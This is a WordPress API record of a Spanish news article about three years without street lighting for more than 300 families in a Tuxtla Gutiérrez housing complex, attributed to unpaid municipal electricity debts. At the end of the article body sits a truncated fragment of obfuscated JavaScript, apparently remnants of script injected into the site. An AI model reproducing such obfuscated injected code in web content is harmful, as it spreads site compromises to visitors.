{"id":19190,"date":"2024-12-05T06:22:41","date_gmt":"2024-12-05T06:22:41","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=19190"},"modified":"2024-12-05T06:22:42","modified_gmt":"2024-12-05T06:22:42","slug":"denuncian-falta-de-servicio-de-energia-electrica-en-los-poetas","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=19190","title":{"rendered":"Denuncian Falta de servicio de energ\u00eda el\u00e9ctrica en Los Poetas"},"content":{"rendered":"\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"600\" height=\"400\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/12\/FB_IMG_1733379640235.jpg\" alt=\"\" class=\"wp-image-19191\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/12\/FB_IMG_1733379640235.jpg 600w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/12\/FB_IMG_1733379640235-300x200.jpg 300w\" sizes=\"auto, (max-width: 600px) 100vw, 600px\" \/><\/figure>\n\n\n\n<p>Manuel Jim\u00e9nez.<\/p>\n\n\n\n<p>4 de diciembre del 2024. Tuxtla Guti\u00e9rrez. &#8211; Habitantes de los Condominios Poetas V denuncian que no tiene alumbrado p\u00fablico desde hace tres a\u00f1os y afecta a m\u00e1s de 300 familias de este punto de la capital chiapaneca.<\/p>\n\n\n\n<p>De acuerdo con la denuncia de los afectados, este problema se origin\u00f3 por falta de pago por parte del ayuntamiento en la administraci\u00f3n de Carlos Morales, a la Comisi\u00f3n Federal de Electricidad.<\/p>\n\n\n\n<p>En este sentido piden al presidente municipal de la capital chiapaneca, ponga atenci\u00f3n a este tema, \u201cporque hasta el momento, nos tiene desangelados, desangeladas, a vecinos y vecinas del citado fraccionamiento que padecen por la falta de este servicio\u201d.<\/p>\n\n\n\n<p>Lamentaron que los responsables de esta situaci\u00f3n, est\u00e1n todav\u00eda trabajando en la presente administraci\u00f3n, por ello la exigencia es que se atienda este reclamo ciudadano.<\/p>\n\n\n\n<p>Seg\u00fan copias de documentos en poder de afectados de la unidad habitacional hace constar que, la responsabilidad recae en el gobierno municipal, a quien se le hace saber para su conocimiento, atienda y resuelva.<br>\u201cNos tienen a oscuras sin que nadie se haga responsable menos que nos resuelvan este problema\u201d, se\u00f1alaron los afectados.<\/p>\n\n\n\n<p>Recordaron que, se intent\u00f3 en la administraci\u00f3n pasada contactar a diferentes funcionarios entre ellos el que era regidor, Hugo Roblero, Juan Pablo Z\u00e1rate secretario municipal, Alexis S\u00e1nchez, de comunicaci\u00f3n social, incluso acercamiento con la arquitecta, Claudia Vaca, quien ahora ser\u00e1 titular del SMAPA.<\/p>\n\n\n\n<p>Que se investigue y se d\u00e9 soluci\u00f3n a ese adeudo millonario, con la paraestatal, del cual se deslinda la constructora Desarrolladora de los Aguilera y compa\u00f1\u00eda igualmente la paraestatal del servicio de energ\u00eda el\u00e9ctrica.<br>0000000<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Manuel Jim\u00e9nez. 4 de diciembre del 2024. Tuxtla Guti\u00e9rrez. &#8211; Habitantes de los Condominios Poetas V denuncian que no tiene alumbrado p\u00fablico desde hace tres a\u00f1os y afecta a m\u00e1s de 300 familias de este punto de la capital chiapaneca. De acuerdo con la denuncia de los afectados, este problema se origin\u00f3 por falta de &hellip;<\/p>\n","protected":false},"author":2,"featured_media":19191,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-19190","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/19190","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=19190"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/19190\/revisions"}],"predecessor-version":[{"id":19192,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/19190\/revisions\/19192"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/19191"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=19190"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=19190"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=19190"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}